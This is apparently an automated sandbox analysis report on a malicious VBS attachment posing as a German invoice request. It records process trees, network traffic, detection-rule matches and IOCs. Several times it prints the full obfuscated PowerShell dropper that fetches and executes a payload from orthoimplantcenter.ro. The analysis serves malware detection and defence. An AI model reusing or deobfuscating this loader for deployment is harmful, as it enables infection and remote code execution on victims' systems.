LBoliidiasEGramn AffTBe,i ');Orfrays ($Udbyttebehandling);Orfrays (Lymnaeid 'Vu g$RevoG nimy JagmRykknDiglachrisAktii wrouTra mSa,o.af.eH oopeEnroaOstrd Mone storArtis cle[Hand$TypeV EksgNsketGrshi Indg AuthUneqekampd K ne lufnPol s Paa]Un
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Anfrage fur Proforma-Lieferrechnung und Zahlungsbedingungen.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Anfrage fur Proforma-Lieferrechnung und Zahlungsbedingungen.vbs", CommandLine|base64offset|contains: ~, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2592, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Anfrage fur Proforma-Lieferrechnung und Zahlungsbedingungen.vbs", ProcessId: 7460, ProcessName: wscript.exe
              Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Anfrage fur Proforma-Lieferrechnung und Zahlungsbedingungen.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Anfrage fur Proforma-Lieferrechnung und Zahlungsbedingungen.vbs", CommandLine|base64offset|contains: ~, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2592, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Anfrage fur Proforma-Lieferrechnung und Zahlungsbedingungen.vbs", ProcessId: 7460, ProcessName: wscript.exe
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Inspeaking Overpratice Hreapparater Heteroscian #>;$Filibusterous='Koordinatvrdiernes';<#Panhygrous Procurer Cantors Emeraldine #>;$Husklike=$Erhvervsaffaldets+$host.UI; function Lymnaeid($Simonize){If ($Husklike) {$Methodisty++;}$Minimumstermometeret=$Knaster+$Simonize.'Length'-$Methodisty; for( $Pales=4;$Pales -lt $Minimumstermometeret;$Pales+=5){$Postcardinal=$Pales;$Dekompressionen+=$Simonize[$Pales];$underbreeding='Helstegte';}$Dekompressionen;}function Orfrays($Advolution){ .($Landbetjents) ($Advolution);}$originate=Lymnaeid 'UnsuMAntiokampzBlegi R,nlBerelHobbaCo p/ run ';$originate+=Lymnaeid 'fors5Kjel.Thom0F,rb Nama(KaprW UnfiNo onDueldS,jdolagowMil,sObsc SixpN UndTPoly Skri1 Dyb0rigs.Toko0Scia;Unde BullWUnpri IndnNont6 Res4Soci;lind AminxBlya6Hngs4met.;rlin CaprfolkvLizz:Egoi1Tand3Fest1Anta. .al0 Fi )Cl.p JogG yrkedecoc.orbkG.aso fej/ Kir2Skil0erek1 ob0 c,n0Myon1Prod0Ddss1Acqu PumFAt,li .lorIndieHus fDeloo Im,xBena/Tha 1Colo3S ip1Pap . git0 Tre ';$Vgtighedens=Lymnaeid 'Erh.u Bous D fE Currunbl-parka P,pgstate axnBibltFore ';$Adaptively=Lymnaeid ' trh Bist Cont An pFares B,l:Agen/Rund/KvaloDeforC ratStabhBruloVe biBo,smOutspSolfl.kdea BaanSnontDeckcBuc eSokknVerdt U,eeNondrFire.arkarNldeoTech/CarbBPageeB.rtsSlabtDobbyPolir HeleUn.etBed,.squaoMirkc Uncximcn ';$Reformbevgelser=Lymnaeid 'Pre,>R,ma ';$Landbetjents=Lymnaeid 'Ma ci,atoE impxS.rv ';$Befolk='lousin';$Vitalizings='\Kinetoplast.Liq';Orfrays (Lymnaeid 'Patr$BrysgUnpol So OKronB UpsaS iklLulu: icho Pr.dU,naI Sy SAlloEkatarprecELevi=Rede$Do re SalnKlikvChef:lynnAMa opFluoPS msdKamea,nddtE eraPyro+Foto$ Vr.vNadvI OphT ilmA Letl ,idiSubtzBawdiDy en Re GMilkSBr.t ');Orfrays (Lymnaeid ' S r$af rg,pspLDr,aOOpfoBCo ca UndlTe r:Hyp.dHun.O,remBUnspbnar ENamel Maht HiehUnchENedsdUpereRabaRFossN LogE a bsSham= r c$Di kALyttdDrataTiggP DeitTvanIScanVD maeRom L,odsYAnan.MegasTradpb dqlUdgiIune.T J n(Tr a$Srnur eaueAngeF Fo.OGradr VelMEst,b ileDatav Gu.GRetoEC.njLPhansSjleE Tonr Ecd)G ln ');Orfrays (Lymnaeid ' Svm[HespNEuklE bnetHest.BackSF dsEPolyRVic vConsIKultCEnduE egiPKonkoGrypiSmaaNAaret RhymKulmAGennnanalA L aGM,skekonfrairm] Lux: D.k:Nonms Di.EOverc OveUDispRCaviIActutJuryyBygnpRin,RGrimoM.eaTOpdaoDuoeCHudiOManiLUn n Farv=E,te Brug[ UndnTungeRigsTSky .BilcSR goE AttcSw,euKorrrCaphi Kikt andYNavnpBlokREk io Armt AmaoO,nocspoooU,trl Ma.TC viY.rogPMyste U y]Hal :Chin:AlahtEm,iL EncSDepe1Udda2Az m ');$Adaptively=$Dobbelthedernes[0];$Udbyttebehandling=(Lymnaeid ' Lea$DrilGPneuLHoteOBeneBSem.aNdeslPyic:PuliG kniYDiscM F gNSk mAfamisKvisIThigUD.ntmSimu=BrugnPeleE.aboW imr-UnsooAk ibPoliJ,dpoeTolvCS riTAgro AsmasSk iYMastsNonotimpeEquo MSu c.antinImprEKabuTPaa,. BygwVandESligBOutpCInd LBoliidiasEGramn AffTBe,i ');Orfrays ($Udbyttebehandling);Orfrays (Lymnaeid 'Vu g$RevoG nimy JagmRykknDiglachrisAktii wrouTra mSa,o.af.eH oopeEnroaOstrd Mone storArtis cle[Hand$TypeV EksgNsketGrshi Indg AuthUneqekampd K ne lufnPol s Paa]Un
              No Suricata rule has matched

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.2% probability
              Source: unknownHTTPS traffic detected: 188.241.183.45:443 -> 192.168.2.11:49706 version: TLS 1.2
              Source: Binary string: m.Core.pdbk source: powershell.exe, 00000007.00000002.2864093210.0000000008588000.00000004.00000020.00020000.00000000.sdmp

              Software Vulnerabilities

              barindex
              Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

              Networking

              barindex
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping gormezl_6777.6777.6777.677e
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: global trafficHTTP traffic detected: GET /Bestyret.ocx HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: orthoimplantcenter.roConnection: Keep-Alive
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /Bestyret.ocx HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: orthoimplantcenter.roConnection: Keep-Alive
              Source: global trafficDNS traffic detected: DNS query: gormezl_6777.6777.6777.677e
              Source: global trafficDNS traffic detected: DNS query: orthoimplantcenter.ro
              Source: powershell.exe, 00000007.00000002.2864093210.0000000008570000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
              Source: 77EC63BDA74BD0D0E0426DC8F80085060.1.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
              Source: wscript.exe, 00000001.00000002.1564405714.000001B46EDBC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1562697497.000001B46EDAF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1563518584.000001B46EDBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab:
              Source: wscript.exe, 00000001.00000003.1555385159.000001B46EE0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?91b5065270408
              Source: wscript.exe, 00000001.00000003.1554978924.000001B470C57000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1555631445.000001B470C57000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1554448292.000001B470C57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabl
              Source: wscript.exe, 00000001.00000002.1564405714.000001B46EDBC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1562697497.000001B46EDAF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1563518584.000001B46EDBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabmexol
              Source: wscript.exe, 00000001.00000002.1564405714.000001B46EDBC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1562697497.000001B46EDAF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1563518584.000001B46EDBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enj
              Source: wscript.exe, 00000001.00000003.1555506674.000001B46EE32000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1555385159.000001B46EE0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?91b5065270
              Source: powershell.exe, 00000004.00000002.1704308297.000001DE999BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2850277699.0000000005DD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000004.00000002.1684347363.000001DE8B6D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://orthoimplantcenter.ro
              Source: powershell.exe, 00000007.00000002.2833765979.0000000004EC7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000004.00000002.1684347363.000001DE89951000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2833765979.0000000004D71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000004.00000002.1710822472.000001DEA2092000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wicroft.com
              Source: powershell.exe, 00000007.00000002.2833765979.0000000004EC7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000004.00000002.1684347363.000001DE89951000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 00000007.00000002.2833765979.0000000004D71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB_q
              Source: powershell.exe, 00000007.00000002.2850277699.0000000005DD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000007.00000002.2850277699.0000000005DD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000007.00000002.2850277699.0000000005DD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 00000007.00000002.2833765979.0000000004EC7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000004.00000002.1684347363.000001DE8AD57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: powershell.exe, 00000004.00000002.1704308297.000001DE999BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2850277699.0000000005DD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 00000004.00000002.1684347363.000001DE89B78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1684347363.000001DE8B300000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://orthoimplantcenter.ro
              Source: powershell.exe, 00000004.00000002.1684347363.000001DE89B78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://orthoimplantcenter.ro/Bestyret.ocxP
              Source: powershell.exe, 00000007.00000002.2833765979.0000000004EC7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://orthoimplantcenter.ro/Bestyret.ocxXR1lX
              Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
              Source: unknownHTTPS traffic detected: 188.241.183.45:443 -> 192.168.2.11:49706 version: TLS 1.2

              System Summary

              barindex
              Source: amsi32_8028.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 7660, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 8028, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Inspeaking Overpratice Hreapparater Heteroscian #>;$Filibusterous='Koordinatvrdiernes';<#Panhygrous Procurer Cantors Emeraldine #>;$Husklike=$Erhvervsaffaldets+$host.UI; function Lymnaeid($Simonize){If ($Husklike) {$Methodisty++;}$Minimumstermometeret=$Knaster+$Simonize.'Length'-$Methodisty; for( $Pales=4;$Pales -lt $Minimumstermometeret;$Pales+=5){$Postcardinal=$Pales;$Dekompressionen+=$Simonize[$Pales];$underbreeding='Helstegte';}$Dekompressionen;}function Orfrays($Advolution){ .($Landbetjents) ($Advolution);}$originate=Lymnaeid 'UnsuMAntiokampzBlegi R,nlBerelHobbaCo p/ run ';$originate+=Lymnaeid 'fors5Kjel.Thom0F,rb Nama(KaprW UnfiNo onDueldS,jdolagowMil,sObsc SixpN UndTPoly Skri1 Dyb0rigs.Toko0Scia;Unde BullWUnpri IndnNont6 Res4Soci;lind AminxBlya6Hngs4met.;rlin CaprfolkvLizz:Egoi1Tand3Fest1Anta. .al0 Fi )Cl.p JogG yrkedecoc.orbkG.aso fej/ Kir2Skil0erek1 ob0 c,n0Myon1Prod0Ddss1Acqu PumFAt,li .lorIndieHus fDeloo Im,xBena/Tha 1Colo3S ip1Pap . git0 Tre ';$Vgtighedens=Lymnaeid 'Erh.u Bous D fE Currunbl-parka P,pgstate axnBibltFore ';$Adaptively=Lymnaeid ' trh Bist Cont An pFares B,l:Agen/Rund/KvaloDeforC ratStabhBruloVe biBo,smOutspSolfl.kdea BaanSnontDeckcBuc eSokknVerdt U,eeNondrFire.arkarNldeoTech/CarbBPageeB.rtsSlabtDobbyPolir HeleUn.etBed,.squaoMirkc Uncximcn ';$Reformbevgelser=Lymnaeid 'Pre,>R,ma ';$Landbetjents=Lymnaeid 'Ma ci,atoE impxS.rv ';$Befolk='lousin';$Vitalizings='\Kinetoplast.Liq';Orfrays (Lymnaeid 'Patr$BrysgUnpol So OKronB UpsaS iklLulu: icho Pr.dU,naI Sy SAlloEkatarprecELevi=Rede$Do re SalnKlikvChef:lynnAMa opFluoPS msdKamea,nddtE eraPyro+Foto$ Vr.vNadvI OphT ilmA Letl ,idiSubtzBawdiDy en Re GMilkSBr.t ');Orfrays (Lymnaeid ' S r$af rg,pspLDr,aOOpfoBCo ca UndlTe r:Hyp.dHun.O,remBUnspbnar ENamel Maht HiehUnchENedsdUpereRabaRFossN LogE a bsSham= r c$Di kALyttdDrataTiggP DeitTvanIScanVD maeRom L,odsYAnan.MegasTradpb dqlUdgiIune.T J n(Tr a$Srnur eaueAngeF Fo.OGradr VelMEst,b ileDatav Gu.GRetoEC.njLPhansSjleE Tonr Ecd)G ln ');Orfrays (Lymnaeid ' Svm[HespNEuklE bnetHest.BackSF dsEPolyRVic vConsIKultCEnduE egiPKonkoGrypiSmaaNAaret RhymKulmAGennnanalA L aGM,skekonfrairm] Lux: D.k:Nonms Di.EOverc OveUDispRCaviIActutJuryyBygnpRin,RGrimoM.eaTOpdaoDuoeCHudiOManiLUn n Farv=E,te Brug[ UndnTungeRigsTSky .BilcSR goE AttcSw,euKorrrCaphi Kikt andYNavnpBlokREk io Armt AmaoO,nocspoooU,trl Ma.TC viY.rogPMyste U y]Hal :Chin:AlahtEm,iL EncSDepe1Udda2Az m ');$Adaptively=$Dobbelthedernes[0];$Udbyttebehandling=(Lymnaeid ' Lea$DrilGPneuLHoteOBeneBSem.aNdeslPyic:PuliG kniYDiscM F gNSk mAfamisKvisIThigUD.ntmSimu=BrugnPeleE.aboW imr-UnsooAk ibPoliJ,dpoeTolvCS riTAgro AsmasSk iYMastsNonotimpeEquo MSu c.antinImprEKabuTPaa,. BygwVandESligBOutpCInd LBoliidiasEGramn AffTBe,i ');Orfrays ($Udbyttebehandling);Orfrays (Lymnaeid 'Vu g$RevoG nimy JagmRykknDiglachrisAktii wrouTra mSa,o.af.eH oopeEnroaOstrd Mone storArtis cle[Hand$TypeV EksgNs
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Inspeaking Overpratice Hreapparater Heteroscian #>;$Filibusterous='Koordinatvrdiernes';<#Panhygrous Procurer Cantors Emeraldine #>;$Husklike=$Erhvervsaffaldets+$host.UI; function Lymnaeid($Simonize){If ($Husklike) {$Methodisty++;}$Minimumstermometeret=$Knaster+$Simonize.'Length'-$Methodisty; for( $Pales=4;$Pales -lt $Minimumstermometeret;$Pales+=5){$Postcardinal=$Pales;$Dekompressionen+=$Simonize[$Pales];$underbreeding='Helstegte';}$Dekompressionen;}function Orfrays($Advolution){ .($Landbetjents) ($Advolution);}$originate=Lymnaeid 'UnsuMAntiokampzBlegi R,nlBerelHobbaCo p/ run ';$originate+=Lymnaeid 'fors5Kjel.Thom0F,rb Nama(KaprW UnfiNo onDueldS,jdolagowMil,sObsc SixpN UndTPoly Skri1 Dyb0rigs.Toko0Scia;Unde BullWUnpri IndnNont6 Res4Soci;lind AminxBlya6Hngs4met.;rlin CaprfolkvLizz:Egoi1Tand3Fest1Anta. .al0 Fi )Cl.p JogG yrkedecoc.orbkG.aso fej/ Kir2Skil0erek1 ob0 c,n0Myon1Prod0Ddss1Acqu PumFAt,li .lorIndieHus fDeloo Im,xBena/Tha 1Colo3S ip1Pap . git0 Tre ';$Vgtighedens=Lymnaeid 'Erh.u Bous D fE Currunbl-parka P,pgstate axnBibltFore ';$Adaptively=Lymnaeid ' trh Bist Cont An pFares B,l:Agen/Rund/KvaloDeforC ratStabhBruloVe biBo,smOutspSolfl.kdea BaanSnontDeckcBuc eSokknVerdt U,eeNondrFire.arkarNldeoTech/CarbBPageeB.rtsSlabtDobbyPolir HeleUn.etBed,.squaoMirkc Uncximcn ';$Reformbevgelser=Lymnaeid 'Pre,>R,ma ';$Landbetjents=Lymnaeid 'Ma ci,atoE impxS.rv ';$Befolk='lousin';$Vitalizings='\Kinetoplast.Liq';Orfrays (Lymnaeid 'Patr$BrysgUnpol So OKronB UpsaS iklLulu: icho Pr.dU,naI Sy SAlloEkatarprecELevi=Rede$Do re SalnKlikvChef:lynnAMa opFluoPS msdKamea,nddtE eraPyro+Foto$ Vr.vNadvI OphT ilmA Letl ,idiSubtzBawdiDy en Re GMilkSBr.t ');Orfrays (Lymnaeid ' S r$af rg,pspLDr,aOOpfoBCo ca UndlTe r:Hyp.dHun.O,remBUnspbnar ENamel Maht HiehUnchENedsdUpereRabaRFossN LogE a bsSham= r c$Di kALyttdDrataTiggP DeitTvanIScanVD maeRom L,odsYAnan.MegasTradpb dqlUdgiIune.T J n(Tr a$Srnur eaueAngeF Fo.OGradr VelMEst,b ileDatav Gu.GRetoEC.njLPhansSjleE Tonr Ecd)G ln ');Orfrays (Lymnaeid ' Svm[HespNEuklE bnetHest.BackSF dsEPolyRVic vConsIKultCEnduE egiPKonkoGrypiSmaaNAaret RhymKulmAGennnanalA L aGM,skekonfrairm] Lux: D.k:Nonms Di.EOverc OveUDispRCaviIActutJuryyBygnpRin,RGrimoM.eaTOpdaoDuoeCHudiOManiLUn n Farv=E,te Brug[ UndnTungeRigsTSky .BilcSR goE AttcSw,euKorrrCaphi Kikt andYNavnpBlokREk io Armt AmaoO,nocspoooU,trl Ma.TC viY.rogPMyste U y]Hal :Chin:AlahtEm,iL EncSDepe1Udda2Az m ');$Adaptively=$Dobbelthedernes[0];$Udbyttebehandling=(Lymnaeid ' Lea$DrilGPneuLHoteOBeneBSem.aNdeslPyic:PuliG kniYDiscM F gNSk mAfamisKvisIThigUD.ntmSimu=BrugnPeleE.aboW imr-UnsooAk ibPoliJ,dpoeTolvCS riTAgro AsmasSk iYMastsNonotimpeEquo MSu c.antinImprEKabuTPaa,. BygwVandESligBOutpCInd LBoliidiasEGramn AffTBe,i ');Orfrays ($Udbyttebehandling);Orfrays (Lymnaeid 'Vu g$RevoG nimy JagmRykknDiglachrisAktii wrouTra mSa,o.af.eH oopeEnroaOstrd Mone storArtis cle[Hand$TypeV EksgNsJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess Stats: CPU usage > 49%
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_032BEDE07_2_032BEDE0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_032BFAB87_2_032BFAB8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_032BEA987_2_032BEA98
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_0797CEE07_2_0797CEE0
              Source: Anfrage fur Proforma-Lieferrechnung und Zahlungsbedingungen.vbsInitial sample: Strings found which are bigger than 50
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 6127
              Source: unknownProcess created: Commandline size = 6127
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 6127Jump to behavior
              Source: amsi32_8028.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 7660, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 8028, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engineClassification label: mal100.troj.expl.evad.winVBS@9/9@2/1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Kinetoplast.LiqJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7580:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8036:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7668:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l30usody.dgt.ps1Jump to behavior
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Anfrage fur Proforma-Lieferrechnung und Zahlungsbedingungen.vbs"
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process Where Name = &apos;Podedes.exe&apos;
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7660
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=8028
              Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Anfrage fur Proforma-Lieferrechnung und Zahlungsbedingungen.vbs"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping gormezl_6777.6777.6777.677e
              Source: C:\Windows\System32\PING.EXEProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Inspeaking Overpratice Hreapparater Heteroscian #>;$Filibusterous='Koordinatvrdiernes';<#Panhygrous Procurer Cantors Emeraldine #>;$Husklike=$Erhvervsaffaldets+$host.UI; function Lymnaeid($Simonize){If ($Husklike) {$Methodisty++;}$Minimumstermometeret=$Knaster+$Simonize.'Length'-$Methodisty; for( $Pales=4;$Pales -lt $Minimumstermometeret;$Pales+=5){$Postcardinal=$Pales;$Dekompressionen+=$Simonize[$Pales];$underbreeding='Helstegte';}$Dekompressionen;}function Orfrays($Advolution){ .($Landbetjents) ($Advolution);}$originate=Lymnaeid 'UnsuMAntiokampzBlegi R,nlBerelHobbaCo p/ run ';$originate+=Lymnaeid 'fors5Kjel.Thom0F,rb Nama(KaprW UnfiNo onDueldS,jdolagowMil,sObsc SixpN UndTPoly Skri1 Dyb0rigs.Toko0Scia;Unde BullWUnpri IndnNont6 Res4Soci;lind AminxBlya6Hngs4met.;rlin CaprfolkvLizz:Egoi1Tand3Fest1Anta. .al0 Fi )Cl.p JogG yrkedecoc.orbkG.aso fej/ Kir2Skil0erek1 ob0 c,n0Myon1Prod0Ddss1Acqu PumFAt,li .lorIndieHus fDeloo Im,xBena/Tha 1Colo3S ip1Pap . git0 Tre ';$Vgtighedens=Lymnaeid 'Erh.u Bous D fE Currunbl-parka P,pgstate axnBibltFore ';$Adaptively=Lymnaeid ' trh Bist Cont An pFares B,l:Agen/Rund/KvaloDeforC ratStabhBruloVe biBo,smOutspSolfl.kdea BaanSnontDeckcBuc eSokknVerdt U,eeNondrFire.arkarNldeoTech/CarbBPageeB.rtsSlabtDobbyPolir HeleUn.etBed,.squaoMirkc Uncximcn ';$Reformbevgelser=Lymnaeid 'Pre,>R,ma ';$Landbetjents=Lymnaeid 'Ma ci,atoE impxS.rv ';$Befolk='lousin';$Vitalizings='\Kinetoplast.Liq';Orfrays (Lymnaeid 'Patr$BrysgUnpol So OKronB UpsaS iklLulu: icho Pr.dU,naI Sy SAlloEkatarprecELevi=Rede$Do re SalnKlikvChef:lynnAMa opFluoPS msdKamea,nddtE eraPyro+Foto$ Vr.vNadvI OphT ilmA Letl ,idiSubtzBawdiDy en Re GMilkSBr.t ');Orfrays (Lymnaeid ' S r$af rg,pspLDr,aOOpfoBCo ca UndlTe r:Hyp.dHun.O,remBUnspbnar ENamel Maht HiehUnchENedsdUpereRabaRFossN LogE a bsSham= r c$Di kALyttdDrataTiggP DeitTvanIScanVD maeRom L,odsYAnan.MegasTradpb dqlUdgiIune.T J n(Tr a$Srnur eaueAngeF Fo.OGradr VelMEst,b ileDatav Gu.GRetoEC.njLPhansSjleE Tonr Ecd)G ln ');Orfrays (Lymnaeid ' Svm[HespNEuklE bnetHest.BackSF dsEPolyRVic vConsIKultCEnduE egiPKonkoGrypiSmaaNAaret RhymKulmAGennnanalA L aGM,skekonfrairm] Lux: D.k:Nonms Di.EOverc OveUDispRCaviIActutJuryyBygnpRin,RGrimoM.eaTOpdaoDuoeCHudiOManiLUn n Farv=E,te Brug[ UndnTungeRigsTSky .BilcSR goE AttcSw,euKorrrCaphi Kikt andYNavnpBlokREk io Armt AmaoO,nocspoooU,trl Ma.TC viY.rogPMyste U y]Hal :Chin:AlahtEm,iL EncSDepe1Udda2Az m ');$Adaptively=$Dobbelthedernes[0];$Udbyttebehandling=(Lymnaeid ' Lea$DrilGPneuLHoteOBeneBSem.aNdeslPyic:PuliG kniYDiscM F gNSk mAfamisKvisIThigUD.ntmSimu=BrugnPeleE.aboW 